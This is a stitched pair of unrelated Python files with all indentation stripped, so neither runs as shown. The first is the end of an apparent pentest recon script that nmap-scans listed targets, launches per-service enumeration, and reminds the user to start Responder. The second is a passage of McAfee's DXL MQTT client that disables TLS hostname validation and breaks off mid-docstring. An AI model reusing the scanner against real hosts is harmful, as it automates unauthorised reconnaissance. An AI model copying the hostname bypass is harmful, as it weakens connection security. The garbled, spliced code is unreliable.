line = line.strip()
if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
while " " in line:
line = line.replace(" ", " ");
linesplit= line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
if ("http" in service):
multProc(httpEnum, ip_address, port)
elif ("ajp13" in service):
multProc(jserveEnum, ip_address, port)
elif ("domain" in service): #don't want to miss if DNS is on TCP
multProc(dnsEnum, ip_address, port)
elif ("login" in service or "exec" in service or "shell" in service):
multProc(rloginEnum, ip_address, port)
elif ("finger" in service):
multProc(fingerEnum, ip_address, port)
elif ("ftp" in service):
multProc(ftpEnum, ip_address, port)
elif ("ldap" in service):
multProc(ldapEnum, ip_address, port)
elif ("netbios-ssn" in service):
multProc(smbEnum, ip_address,port)
elif ("microsoft-ds" in service):
multProc(smbEnum, ip_address, port)
elif ("ms-sql" in service or "mssql" in service):
multProc(mssqlEnum, ip_address, port)
elif ("my-sql" in service or "mysql" in service):
multProc(mysqlEnum, ip_address, port)
elif ("nfs" in service):
multProc(nfsEnum, ip_address, port)
elif ("rdp" in service or "ms-wbt-server" in service):
multProc(rdpEnum, ip_address, port)
elif ("rpcbind" == service):
multProc(rpcbindEnum, ip_address, port)
elif ("ssh/http" in service or "https" in service):
multProc(httpsEnum, ip_address, port)
elif ("ssh" in service):
multProc(sshEnum, ip_address, port)
elif ("smtp" in service):
multProc(smtpEnum, ip_address, port)
elif ("telnet" in service):
multProc(telnetEnum, ip_address, port)
elif ("tftp" in service):
multProc(tftpEnum, ip_address, port)
def nmapVersionUDPAndPass(ip_address, port):
uniNmapUDP = "nmap -n -vv -Pn -A -sC -sU -T 4 -p %s -oA '/root/scripts/recon_enum/results/exam/nmap/%s_%sU.nmap' %s" % (port, ip_address, port, ip_address)
lines = subprocess.check_output(['nmap','-n','-vv','-Pn','-A','-sC','-sU','-T','4','-p',port,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%s_%sU" % (ip_address,port),ip_address]).split("\n")
print "INFO: nmap version and pass for UDP %s:%s completed" % (ip_address, port)
for line in lines:
line = line.strip()
if ("udp" in line) and ("open" in line) and not ("Discovered" in line):
while " " in line:
line = line.replace(" ", " ");
linesplit= line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
if ("domain" in service):
multProc(dnsEnum, ip_address, port)
elif ("snmp" in service):
multProc(snmpEnum, ip_address, port)
#makedir function from https://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python
#Compatible with Python >2.5, but there is a more advanced function for python 3.5
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: #Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
#Create the directories that are currently hardcoded in the script
#dotdotpwn directory for reports created automatically by dotdotpwn just in case user wants them
def createDirectories():
scriptsToRun = "dirb","dirb/80","dirb/443","dotdotpwn","finger","ftp","http","ldap","msrpc","mssql","mysql","nfs","nikto","nmap","rdp","rpc","smb","smtp","snmp","ssh","ssl","telnet","tftp","whatweb"
for path in scriptsToRun:
mkdir_p("/root/scripts/recon_enum/results/exam/%s" % path)
mkdir_p("/usr/share/dotdotpwn/Reports")
def backupExisting():
print "INFO: Previous folders found, zipping backup"
#tmp move targets.txt, zip files, backup, remove dirs, restore targets.txt
movedTargets = False
movedDotTemplate = False
if os.path.isfile("/root/scripts/recon_enum/results/exam/targets.txt"):
os.rename("/root/scripts/recon_enum/results/exam/targets.txt", "/root/scripts/recon_enum/results/targets.txt")
movedTargets = True
if os.path.isfile("/root/scripts/recon_enum/results/exam/dot_template"):
os.rename("/root/scripts/recon_enum/results/exam/dot_template", "/root/scripts/recon_enum/results/dot_template")
movedDotTemplate = True
backupName = "backup_%s.tar.gz" % (time.strftime("%H:%M"))
BACKUP = "tar czf /root/Downloads/%s /root/scripts/recon_enum/results/exam/* --remove-files" % (backupName)
backupResults = subprocess.check_output(BACKUP, shell=True)
if movedTargets == True:
os.rename("/root/scripts/recon_enum/results/targets.txt", "/root/scripts/recon_enum/results/exam/targets.txt")
if movedDotTemplate == True:
os.rename("/root/scripts/recon_enum/results/dot_template", "/root/scripts/recon_enum/results/exam/dot_template")
#Symlink needed directories into /usr/share/wordlists
#This functionality for a distro like Kali
#Wordlists folder used for ftp and ssh recon scripts
def mksymlink():
dirsToLink = "/root/lists","/root/lists/SecLists-master"
dst = "/usr/share/wordlists"
for path in dirsToLink:
tmp = path.split("/")
try:
os.symlink(path, dst + "/" + tmp[-1])
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
# grab the discover scan results and start scanning up hosts
def printBanner():
print "##############################################################"
print "#### RECON SCAN ####"
print "#### A multi-process service scanner ####"
print "#### finger, http, mssql, mysql, nfs, nmap, ####"
print "#### rdp, smb, smtp, snmp, ssh, telnet, tftp ####"
print "##############################################################"
print "############# Don't forget to start your TCPDUMP #############"
print "############ Don't forget to start your RESPONDER ############"
print "##############################################################"
print "##### This tool relies on many others. Please ensure you #####"
print "##### run setup.sh first and have all tools in your PATH #####"
print "##############################################################"
#The script creates the directories that the results will be placed in
#User needs to place the targets in the results/exam/targets.txt file
if __name__=='__main__':
printBanner()
if os.path.isdir('/root/scripts/recon_enum/results/exam/nmap'):
backupExisting()
mksymlink()
createDirectories()
# CHANGE THIS!! grab the alive hosts from the discovery scan for enum
# Also check Nmap user-agent string, should be set to Firefox or other
if os.path.isfile('/root/scripts/recon_enum/results/exam/targets.txt'):
if os.path.getsize('/root/scripts/recon_enum/results/exam/targets.txt') > 2: #0 is empty, 2 is file with \n
try:
f = open('/root/scripts/recon_enum/results/exam/targets.txt', 'r')
except:
raise
else:
print "ERROR: Is targets.txt blank?! Please ensure targets.txt is populated. Run aliverecon.py or something"
exit(0)
else:
print "ERROR: No targets.txt detected! Please ensure targets.txt is populated. Run aliverecon.py or something"
exit(0)
for scanip in f:
jobs = []
if scanip[0] != "#":
p = multiprocessing.Process(target=nmapFullFastScan, args=(scanip,)) #comma needed to only pass single arg
jobs.append(p)
p.start()
f.close()
|
client.py
|
# -*- coding: utf-8 -*-
################################################################################
# Copyright (c) 2017 McAfee Inc. - All Rights Reserved.
################################################################################
import threading
import logging
import ssl
import traceback
import random
import paho.mqtt.client as mqtt # pylint: disable=import-error
from dxlclient import _BaseObject
from dxlclient.client_config import DxlClientConfig
import dxlclient._callback_manager as callback_manager
from dxlclient._request_manager import RequestManager
from dxlclient.exceptions import DxlException
from dxlclient.message import Message, Event, Request, Response, ErrorResponse
from dxlclient._thread_pool import ThreadPool
from dxlclient.exceptions import _raise_wrapped_exception
from dxlclient.service import _ServiceManager
from dxlclient._uuid_generator import UuidGenerator
from _dxl_utils import DxlUtils
__all__ = [
# Callbacks
"_on_connect", "_on_disconnect", "_on_message", "_on_log",
# Client
"DxlClient",
# Constants
"DXL_ERR_AGAIN", "DXL_ERR_SUCCESS", "DXL_ERR_INVALID", "DXL_ERR_INTERRUPT",
]
logger = logging.getLogger(__name__)
DXL_ERR_AGAIN = -1
DXL_ERR_SUCCESS = 0
DXL_ERR_INVALID = 1
DXL_ERR_INTERRUPT = 2
################################################################################
#
# Callbacks
#
################################################################################
def _on_connect(client, userdata, rc): # pylint: disable=invalid-name
"""
Called when the broker responds to our connection request.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param rc: The result code
:return: None
"""
if userdata is None or not isinstance(userdata, DxlClient):
raise ValueError("User data object not specified")
self = userdata
with self._connected_lock:
self._connected = True
logger.debug("Connected with result code %s", str(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
with self._subscriptions_lock:
for subscription in self._subscriptions:
try:
logger.debug("Subscribing to %s", subscription)
client.subscribe(subscription)
except Exception as ex:
logger.error("Error during subscribe: %s", str(ex))
logger.debug(traceback.format_exc())
if self._service_manager:
self._service_manager.on_connect()
# Notify that connection status has changed
self._connected_wait_condition.notify_all()
def _on_disconnect(client, userdata, rc): # pylint: disable=invalid-name
"""
Called when the client disconnects from the broker.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param rc: The result code
:return: None
"""
t = threading.Thread(target=_on_disconnect_run, args=[client, userdata, rc])
t.daemon = True
t.start()
def _on_disconnect_run(client, userdata, rc): # pylint: disable=invalid-name
"""
Worker method that is invoked when the client disconnects from the broker.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param rc: The result code
:return: None
"""
# Remove unused parameter
del client
# Check userdata; this needs to be an instance of the DxlClient
if userdata is None or not isinstance(userdata, DxlClient):
raise ValueError("User data object not specified")
self = userdata
with self._connected_lock:
self._connected = False
self._connected_wait_condition.notify_all()
self._reset_current_broker()
if rc == 0:
logger.debug("Disconnected with result code %s", str(rc))
else:
logger.error("Unexpected disconnect with result code %s", str(rc))
# Disconnect the client
self._disconnect()
# Connect the client
if self.config.reconnect_when_disconnected:
self._start_connect_thread()
def _on_message(client, userdata, msg): # pylint: disable=invalid-name
"""
Called when a message has been received on a topic that the client subscribes to.
self callback will be called for every message received.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param msg: The message object
:return: None
"""
# Remove unused parameter
del client
# Check userdata; this needs to be an instance of the DxlClient
if userdata is None or not isinstance(userdata, DxlClient):
raise ValueError("Client reference not specified")
self = userdata
logger.debug("Message received for topic %s", msg.topic)
# TODO: The behavior is one thread per message, but the individual callbacks are handled sequential.
# TODO: self is the same as in the Java client, but is not ideal. One plugin could block the whole
# TODO: execution.
try:
self._thread_pool.add_task(self._handle_message, channel=msg.topic, payload=msg.payload)
except Exception as ex: # pylint: disable=broad-except
logger.exception("Error handling message")
def _on_log(client, userdata, level, buf):
"""
Called when the client has log information. Define to allow debugging.
The level variable gives the severity of the message and will be one of
MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING, MQTT_LOG_ERR, and
MQTT_LOG_DEBUG. The message itself is in buf.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param level: The severity of the message
:param buf: The message itself
:return: None
"""
# Remove unused parameter
del client, userdata
if level == mqtt.MQTT_LOG_INFO:
logger.info("MQTT: %s", str(buf))
elif level == mqtt.MQTT_LOG_NOTICE:
logger.info("MQTT: %s", str(buf))
elif level == mqtt.MQTT_LOG_WARNING:
logger.warn("MQTT: %s", str(buf))
elif level == mqtt.MQTT_LOG_ERR:
logger.error("MQTT: %s", str(buf))
elif level == mqtt.MQTT_LOG_DEBUG:
logger.debug("MQTT: %s", str(buf))
################################################################################
#
# DxlClient
#
################################################################################
# pylint: disable=too-many-instance-attributes, invalid-name, too-many-public-methods
class DxlClient(_BaseObject):
"""
The :class:`DxlClient` class is responsible for all communication with the Data Exchange Layer (DXL)
fabric (it can be thought of as the "main" class). All other classes exist to support the functionality
provided by the client.
The following example demonstrates the configuration of a :class:`DxlClient` instance and
connecting it to the fabric:
.. code-block:: python
from dxlclient.broker import Broker
from dxlclient.client import DxlClient
from dxlclient.client_config import DxlClientConfig
# Create the client configuration
config = DxlClientConfig(
broker_ca_bundle="c:\\\\certs\\\\brokercerts.crt",
cert_file="c:\\\\certs\\\\client.crt",
private_key="c:\\\\certs\\\\client.key",
brokers=[Broker.parse("ssl://192.168.189.12")])
# Create the DXL client
with DxlClient(config) as dxl_client:
# Connect to the fabric
dxl_client.connect()
**NOTE:** The preferred way to construct the client is via the Python "with" statement as shown above. The "with"
statement ensures that resources associated with the client are properly cleaned up when the block is exited.
The following modules support the client:
- :mod:`dxlclient.client_config` : See this module for information on configuring the :class:`DxlClient`
- :mod:`dxlclient.message` : See this module for information on the different types of messages that can be
exchanged over the DXL fabric
- :mod:`dxlclient.callbacks` : See this module for information on registering "callbacks" that are used to
receive messages via the :class:`DxlClient`. This module also includes an example that demonstrate how to
send :class:`dxlclient.message.Event` messages.
- :mod:`dxlclient.service` : See this module for information on registering "services" with the DXL fabric.
This module also includes an example that demonstrates how to invoke a DXL service via the :class:`DxlClient`.
"""
# The default "reply-to" prefix. self is typically used for setting up response
# channels for requests, etc.
_REPLY_TO_PREFIX = "/mcafee/client/"
# The default wait time for a synchronous request, defaults to 1 hour
_DEFAULT_WAIT = 60 * 60
# The default wait for policy delay (in seconds)
_DEFAULT_WAIT_FOR_POLICY_DELAY = 2
# The default minimum amount of threads in a thread pool
_DEFAULT_MIN_POOL_SIZE = 10
# The default maximum amount of threads in a thread pool
_DEFAULT_MAX_POOL_SIZE = 25
# The default quality of server (QOS) for messages
_DEFAULT_QOS = 0
# The default connect wait
_DEFAULT_CONNECT_WAIT = 10 # seconds
def __init__(self, config):
"""
Constructor parameters:
:param config: The :class:`dxlclient.client_config.DxlClientConfig` object containing the configuration
settings for the client.
"""
super(DxlClient, self).__init__()
if config is None or not isinstance(config, DxlClientConfig):
raise ValueError("Client configuration not specified")
# The client configuration
self._config = config
# The lock for the client configuration
self._config_lock = threading.RLock()
# The condition associated with the client configuration
self._config_lock_condition = threading.Condition(self._config_lock)
# The flag for the connection state
self._connected = False
# The lock for the flag for the connection state
self._connected_lock = threading.RLock()
# The condition for the flag on connection state
self._connected_wait_condition = threading.Condition(self._connected_lock)
# The current broker the client is connected to
self._current_broker = None
# The lock for the current broker the client is connected to
self._current_broker_lock = threading.RLock()
# The default wait time for a synchronous request
self._default_wait = self._DEFAULT_WAIT
# The wait for policy delay (in seconds)
self._wait_for_policy_delay = self._DEFAULT_WAIT_FOR_POLICY_DELAY
# The minimum amount of threads in a thread pool
self._core_pool_size = self._DEFAULT_MIN_POOL_SIZE
# The maximum amount of threads in a thread pool
self._maximum_pool_size = self._DEFAULT_MAX_POOL_SIZE
# The quality of server (QOS) for messages
self._qos = self._DEFAULT_QOS
# The "reply-to" prefix. self is typically used for setting up response
# channels for requests, etc.
self._reply_to_topic = self._REPLY_TO_PREFIX + self._config._client_id
# The request callbacks manager
self._request_callbacks = callback_manager._RequestCallbackManager()
# The response callbacks manager
self._response_callbacks = callback_manager._ResponseCallbackManager()
# The event callbacks manager
self._event_callbacks = callback_manager._EventCallbackManager()
# The current list of subscriptions
self._subscriptions = set()
# The lock for the current list of subscriptions
self._subscriptions_lock = threading.RLock()
# The underlying MQTT client instance
self._client = mqtt.Client(client_id=self._config._client_id,
clean_session=True,
userdata=self,
protocol=mqtt.MQTTv31)
# The MQTT client connect callback
self._client.on_connect = _on_connect
# The MQTT client disconnect callback
self._client.on_disconnect = _on_disconnect
# The MQTT client message callback
self._client.on_message = _on_message
# The MQTT client log callback
if logger.isEnabledFor(logging.DEBUG):
self._client.on_log = _on_log
# pylint: disable=no-member
# The MQTT client TLS configuration
self._client.tls_set(config.broker_ca_bundle,
certfile=config.cert_file,
keyfile=config.private_key,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_SSLv23,
ciphers=None)
# The MQTT client TLS configuration to bypass hostname validation
self._client.tls_insecure_set(True)
# Generate a message pool prefix
self._message_pool_prefix = "DxlMessagePool-" + UuidGenerator.generate_id_as_string()
# The thread pool for message handling
self._thread_pool = ThreadPool(
num_threads=config.incoming_message_thread_pool_size,
queue_size=config.incoming_message_queue_size,
thread_prefix = self._message_pool_prefix)
# Subscribe to the client reply channel
self.subscribe(self._reply_to_topic)
# The request manager (manages synchronous and asynchronous request callbacks,
# notifications, etc.).
self._request_manager = RequestManager(client=self)
# The service manager (manages services request callbacks, notifications, etc.).
self._service_manager = _ServiceManager(client=self)
# The loop thread
self._thread = None
# The loop thread terminate flag
self._thread_terminate = False
# The lock for the connect thread
self._connect_wait_lock = threading.RLock()
# The condition associated with the client configuration
self._connect_wait_condition = threading.Condition(self._connect_wait_lock)
self._destroy_lock = threading.RLock()
self._destroyed = False
def __del__(self):
"""destructor"""
super(DxlClient, self).__del__()
self.destroy()
def __enter__(self):
"""Enter with"""
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Exit with"""
self.destroy()
@property
def config(self):
"""
The :class:`dxlclient.client_config.DxlClientConfig` instance that was specified when the
client was constructed.
See :mod:`dxlclient.client_config` for more information on configuring the client.
"""
with self._config_lock:
return self._config
@property
def connected(self):
"""Whether the client is currently connected to the DXL fabric."""
with self._connected_lock:
return self._connected
def connect(self):
"""
Attempts to connect the client to the DXL fabric.
This method does not return until either the client has connected to the fabric or it has exhausted
the number of retries configured for the client causing an exception to be raised.
Several attributes are available for controlling the client retry behavior:
- :attr:`dxlclient.client_config.DxlClientConfig.connect_retries` : The maximum number of connection attempts
for each :class:`dxlclient.broker.Broker` specified in the :class:`dxlclient.client_config.DxlClientConfig`
- :attr:`dxlclient.client_config.DxlClientConfig.reconnect_delay` : The initial delay between retry attempts.
The delay increases ("backs off") as subsequent connection attempts are made.
- :attr:`dxlclient.client_config.DxlClientConfig.reconnect_back_off_multiplier` : Multiples the current
reconnect delay by this value on subsequent connect retries. For example, a current delay of 3 seconds
with a multiplier of 2 would result in the next retry attempt being in 6 seconds.
- :attr:`dxlclient.client_config.DxlClientConfig.reconnect_delay_random` : A randomness delay percentage
(between 0.0 and 1.0) that is used to increase the current retry delay by a random amount for the purpose
of preventing multiple clients from having the same retry pattern
- :attr:`dxlclient.client_config.DxlClientConfig.reconnect_delay_max` : The maximum delay between retry attempts
"""
if self.connected:
raise DxlException("Already connected")
if self._thread is not None:
raise DxlException("Already trying to connect")
# Start the connect thread
self._start_connect_thread(connect_retries=self.config.connect_retries)
# Wait for the connect thread to finish
if self._thread is not None:
while self._thread.isAlive():
self._thread.join(1)
self._thread = None
# Wait for the callback to be invoked
with self._connected_lock:
if not self.connected:
self._connected_wait_condition.wait(5)
# Check if we were connected
if not self.connected:
raise DxlException("Failed to establish connection")
def _start_connect_thread(self, connect_retries=-1):
self._thread = threading.Thread(target=self._connect_thread_main, args=[connect_retries])
self._thread.daemon = True
self._thread.start()
def destroy(self):
"""
Destroys the client (releases all associated resources).
**NOTE:** Once the method has been invoked, no other calls should be made to the client.
Also note that this method should rarely be called directly. Instead, the preferred usage of the
client is via a Python "with" statement as shown below:
.. code-block:: python
# Create the DXL client
with DxlClient(config) as dxl_client:
# Connect to the fabric
dxl_client.connect()
The "with" statement ensures that resources associated with the client are properly cleaned up when the block
is exited (the :func:`destroy` method is invoked).
"""
with self._destroy_lock:
if not self._destroyed:
self._service_manager.destroy()
self._service_manager = None
self._request_manager.destroy()
self._request_manager = None
self.disconnect()
self._thread_pool.shutdown()
self._config = None
self._client.user_data_set( None )
self._client = None
self._destroyed = True
def disconnect(self):
"""
Attempts to disconnect the client from the DXL fabric.
"""
if self._connected:
self._disconnect()
else:
logger.warning("Trying to disconnect a disconnected client.")
def _disconnect(self):
if self._service_manager:
self._service_manager.on_disconnect()
logger.debug("Waiting for thread pool completion...")
self._thread_pool.wait_completion()
for subscription in self._subscriptions:
if self.connected:
try:
logger.debug("Unsubscribing from %s", subscription)
self._client.unsubscribe(subscription)
except Exception as ex: # pylint: disable=broad-except
logger.error("Error during unsubscribe: %s", str(ex))
logger.debug(traceback.format_exc())
# In case of a reconnect after connection loss, the event loop will
# not be stopped and the client will not be forcefully disconnected.
logger.debug("Stopping event loop...")
self._client.loop_stop()
logger.debug("Trying to disconnect client...")
self._client.disconnect()
logger.debug("Disconnected.")
# Make sure the connection loop is done
if self._thread is not None:
logger.debug("Waiting for the thread to terminate...")
self._thread_terminate = True
with self._connect_wait_lock:
self._connect_wait_condition.notifyAll()
while self._thread.isAlive():
self._thread.join(1)
self._thread = None
logger.debug("Thread terminated.")
def _connect_thread_main(self, connect_retries):
"""
The connection thread main function
"""
self._thread_terminate = False
self._loop_until_connected(connect_retries)
def _connect(self, brokers):
"""
Internal function that attempts to connect to one of the given brokers.
:param brokers: The (sorted) list of brokers
"""
self._reset_current_broker()
keep_alive_interval = self.config.keep_alive_interval
latest_ex = None
for broker in brokers:
if self._thread_terminate:
break
if broker._response_time is not None:
try:
if broker._response_from_ip_address:
logger.info("Trying to connect to broker %s...", broker.to_string())
self._client.connect(broker.ip_address, broker.port, keep_alive_interval)
else:
logger.info("Trying to connect to broker %s...", broker.to_string())
self._client.connect(broker.host_name, broker.port, keep_alive_interval)
self._current_broker = broker
break
except Exception as ex: # pylint: disable=broad-except
logger.error("Failed to connect to broker %s: %s",
broker.to_string(),
str(ex))
logger.debug(traceback.format_exc())
latest_ex = ex
if self._current_broker is None:
for broker in brokers:
if self._thread_terminate:
break
try:
logger.info(
"Trying to connect to broker (host name) %s...", broker.to_string())
self._client.connect(broker.host_name, broker.port, keep_alive_interval)
self._current_broker = broker
break
except Exception as ex: # pylint: disable=broad-except
logger.error("Failed to connect to broker (host name) %s: %s",
broker.to_string(), str(ex))
logger.debug(traceback.format_exc())
latest_ex = ex
if self._thread_terminate:
break
if self._current_broker is None and broker.ip_address is not None:
try:
logger.info(
"Trying to connect to broker (IP address) %s (%s:%d)...",
broker.unique_id, broker.ip_address, broker.port)
self._client.connect(broker.ip_address, broker.port, keep_alive_interval)
self._current_broker = broker
break
except Exception as ex: # pylint: disable=broad-except
logger.error("Failed to connect to broker (IP address) %s: %s",
broker.to_string(), str(ex))
logger.debug(traceback.format_exc())
latest_ex = ex
if self._current_broker is not None:
logger.info("Connected to broker %s",
self._current_broker.unique_id)
else:
if latest_ex is not None:
raise latest_ex # pylint: disable=raising-bad-type
def _loop_until_connected(self, connect_retries):
# The client is already connected
if self.connected:
logger.error("Already connected")
return DXL_ERR_INVALID
logger.info("Waiting for broker list...")
self._config_lock.acquire()
try:
while not self._thread_terminate and len(self._config.brokers) == 0:
self._config_lock_condition.wait(self._wait_for_policy_delay)
if len(self._config.brokers) == 0:
logger.debug("No broker defined. Waiting for broker list...")
finally:
self._config_lock.release()
if self._thread_terminate is True:
logger.debug("Stopping...")
return DXL_ERR_INTERRUPT
logger.debug("Checking brokers...")
brokers = self._config._get_sorted_broker_list()
logger.info("Trying to connect...")
retries = connect_retries
retry_delay = self.config.reconnect_delay
first_attempt = True
latest_ex = None
latest_ex_traceback = None
while not self._thread_terminate and (connect_retries < 0 or retries >= 0):
if not first_attempt:
# Determine retry delay
retry_delay_max = self.config.reconnect_delay_max
if retry_delay > retry_delay_max:
retry_delay = retry_delay_max
# Apply random after max (so we still have randomness, may exceed maximum)
retry_delay += ((self.config.reconnect_delay_random * retry_delay) * random.random())
logger.error("Retrying connect in %s seconds: %s", str(retry_delay), str(latest_ex))
# Wait...
with self._connect_wait_lock:
self._connect_wait_condition.wait(retry_delay)
# Update retry delay
retry_delay *= self.config.reconnect_back_off_multiplier
try:
self._connect(brokers)
break
except Exception as ex:
# Track latest exception
latest_ex = ex
latest_ex_traceback = traceback.format_exc()
first_attempt = False
retries -= 1
if self._thread_terminate is True:
logger.info("Stopping...")
return DXL_ERR_INTERRUPT
if not self._current_broker:
if latest_ex:
logger.error("Error during connect: %s", latest_ex.message)
if latest_ex_traceback:
logger.debug(latest_ex_traceback)
logger.debug("Launching event loop...")
self._client.loop_start()
return DXL_ERR_SUCCESS
@property
def current_broker(self):
"""
The :class:`dxlclient.broker.Broker` that the client is currently connected to. ``None`` is returned
if the client is not currently connected to a :class:`dxlclient.broker.Broker`.
"""
with self._current_broker_lock:
if self.connected:
return self._current_broker
else:
return None
def _set_current_broker(self, current_broker):
"""
Internal method. Sets the current broker.
:param current_broker: {@code dxlclient.broker.Broker} to set as current broker.
"""
with self._current_broker_lock:
self._current_broker = current_broker
def _reset_current_broker(self):
"""
Clean current broker.
"""
with self._current_broker_lock:
self._current_broker = None
def subscribe(self, topic):
"""
Subscribes to the specified topic on the DXL fabric. This method is typically used in
conjunction with the registration of :class:`dxlclient.callbacks.EventCallback` instances
via the :func:`add_event_callback` method.
The following is a simple example of using this:
.. code-block:: python
from dxlclient.callbacks import EventCallback
class MyEventCallback(EventCallback):
def on_event(self, event):
print "Received event! " + event.source_client_id
dxl_client.add_event_callback("/testeventtopic", MyEventCallback(), False)
dxl_client.subscribe("/testeventtopic")
**NOTE:** By default when registering an event callback the client will automatically subscribe to the topic.
In this example the :func:`dxlclient.client.DxlClient.add_event_callback` method is invoked with the
``subscribe_to_topic`` parameter set to ``False`` preventing the automatic subscription.
:param topic: The topic to subscribe to
"""
logger.debug("%s(): Waiting for Subscriptions lock...", DxlUtils.func_name())
self._subscriptions_lock.acquire()
try:
if topic not in self._subscriptions:
self._subscriptions.add(topic)
if self.connected:
self._client.subscribe(topic)
finally:
logger.debug("%s(): Releasing Subscriptions lock.", DxlUtils.func_name())
self._subscriptions_lock.release()
def unsubscribe(self, topic):
"""
Unsubscribes from the specified topic on the DXL fabric.
See the :func:`subscribe` method for more information on subscriptions.
:param topic: The topic to unsubscribe from
"""
logger.debug("%s(): Waiting for Subscriptions lock...", DxlUtils.func_name())
self._subscriptions_lock.acquire()
try:
if topic in self._subscriptions:
if self.connected:
self._client.unsubscribe(topic)
finally:
self._subscriptions.remove(topic)
logger.debug("%s(): Releasing Subscriptions lock.", DxlUtils.func_name())
self._subscriptions_lock.release()
@property
def subscriptions(self):
"""
A tuple containing the topics that the client is currently subscribed to
See :func:`subscribe` for more information on adding subscriptions
"""
logger.debug("%s(): Waiting for Subscriptions lock...", DxlUtils.func_name())
self._subscriptions_lock.acquire()
try:
return tuple(self._subscriptions)
finally:
logger.debug("%s(): Releasing Subscriptions lock.", DxlUtils.func_name())
self._subscriptions_lock.release()
def sync_request(self, request, timeout=_DEFAULT_WAIT):
"""
Sends a :class:`dxlclient.message.Request` message to a remote DXL service.
See module :mod:`dxlclient.service` for more information on DXL services.
:param request: The :class:`dxlclient.message.Request` message to send to a remote DXL service
:param timeout: The amount of time (in seconds) to wait for the :class:`dxlclient.message.Response`
to the request. If the timeout is exceeded an exception will be raised. Defaults to ``3600``
seconds (1 hour)
"""
if threading.currentThread().name.startswith(self._message_pool_prefix):
raise DxlException("Synchronous requests may not be invoked while handling an incoming message. " +
"The synchronous request must be made on a different thread.")
return self._request_manager.sync_request(request, timeout)
def async_request(self, request, response_callback=None):
"""
Sends a :class:`dxlclient.message.Request` message to a remote DXL service asynchronously.
This method differs from :func:`sync_request` due to the fact that it returns to the caller
immediately after delivering the :class:`dxlclient.message.Request` message to the DXL fabric (It does
not wait for the corresponding :class:`dxlclient.message.Response` to be received).
An optional :class:`dxlclient.callbacks.ResponseCallback` can be specified. This callback will be invoked
when the corresponding :class:`dxlclient.message.Response` message is received by the client.
See module :mod:`dxlclient.service` for more information on DXL services.
:param request: The :class:`dxlclient.message.Request` message to send to a remote DXL service
:param response_callback: An optional :class:`dxlclient.callbacks.ResponseCallback` that will be invoked
when the corresponding :class:`dxlclient.message.Response` message is received by the client.
"""
return self._request_manager.async_request(request, response_callback)
def _get_async_callback_count(self):
"""
Returns the count of async callbacks that are waiting for a response
:return: The count of async callbacks that are waiting for a response
"""
return self._request_manager._get_async_callback_count()
def _publish_message(self, channel, payload, qos):
"""
Publishes the specified message
:param channel: The channel to publish on
:param payload: The message content
:param qos: The quality of service (QOS)
"""
self._client.publish(topic=channel, payload=payload, qos=qos)
def _send_request(self, request):
"""
Sends the specified request to the DXL fabric.
:param request: The request to send to the DXL fabric
"""
if request is None or not isinstance(request, Request):
raise ValueError("Invalid or unspecified request object")
request.reply_to_topic = self._reply_to_topic
self._publish_message(request.destination_topic, request._to_bytes(), self._qos)
def send_response(self, response):
"""
Attempts to deliver the specified :class:`dxlclient.message.Response` message to the DXL fabric.
The fabric will in turn attempt to deliver the response back to the client who sent the
corresponding :class:`dxlclient.message.Request`.
See module :mod:`dxlclient.message` for more information on message types, how they are delivered to
remote clients, etc.
See module :mod:`dxlclient.service` for more information on DXL services.
:param event: The :class:`dxlclient.message.Event` to send
"""
if response is None or not isinstance(response, Response):
raise ValueError("Invalid or unspecified response object")
self._publish_message(response.destination_topic, response._to_bytes(), self._qos)
def send_event(self, event):
"""
Attempts to deliver the specified :class:`dxlclient.message.Event` message to the DXL fabric.
See module :mod:`dxlclient.message` for more information on message types, how they are delivered to
remote clients, etc.
:param event: The :class:`dxlclient.message.Event` to send
"""
if event is None or not isinstance(event, Event):
raise ValueError("Invalid or unspecified event object")
self._publish_message(event.destination_topic, event._to_bytes(), self._qos)
def add_request_callback(self, topic, request_callback):
"""
Adds a :class:`dxlclient.callbacks.RequestCallback` to the client for the specified topic.
The callback will be invoked when :class:`dxlclient.message.Request` messages are received by the client
on the specified topic. A topic of ``None`` indicates that the callback should receive
:class:`dxlclient.message.Request` messages for all topics (no filtering).
**NOTE:** Usage of this method is quite rare due to the fact that registration of
:class:`dxlclient.callbacks.RequestCallback` instances with the client occurs automatically when
registering a service. See module :mod:`dxlclient.service` for more information on DXL services.
:param topic: The topic to receive :class:`dxlclient.message.Request` messages on. A topic of ``None`` indicates
that the callback should receive :class:`dxlclient.message.Request` messages for all topics (no filtering).
:param request_callback: The :class:`dxlclient.callbacks.RequestCallback` to be invoked when a
:class:`dxlclient.message.Request` message is received on the specified topic
"""
self._request_callbacks.add_callback(("" if topic is None else topic), request_callback)
def remove_request_callback(self, topic, request_callback):
"""
Removes a :class:`dxlclient.callbacks.RequestCallback` from the client for the specified topic. This method
must be invoked with the same arguments as when the callback was originally registered via
:func:`add_request_callback`.
:param topic: The topic to remove the callback for
:param request_callback: The :class:`dxlclient.callbacks.RequestCallback` to be removed for the specified topic
"""
self._request_callbacks.remove_callback(("" if topic is None else topic), request_callback)
def add_response_callback(self, topic, response_callback):
"""
Adds a :class:`dxlclient.callbacks.ResponseCallback` to the client for the specified topic.
The callback will be invoked when :class:`dxlclient.message.Response` messages are received by the client
on the specified topic. A topic of ``None`` indicates that the callback should receive
:class:`dxlclient.message.Response` messages for all topics (no filtering).
**NOTE:** Usage of this method is quite rare due to the fact that the use of
:class:`dxlclient.callbacks.ResponseCallback` instances are typically limited to invoking a
remote DXL service via the :func:`async_request` method.
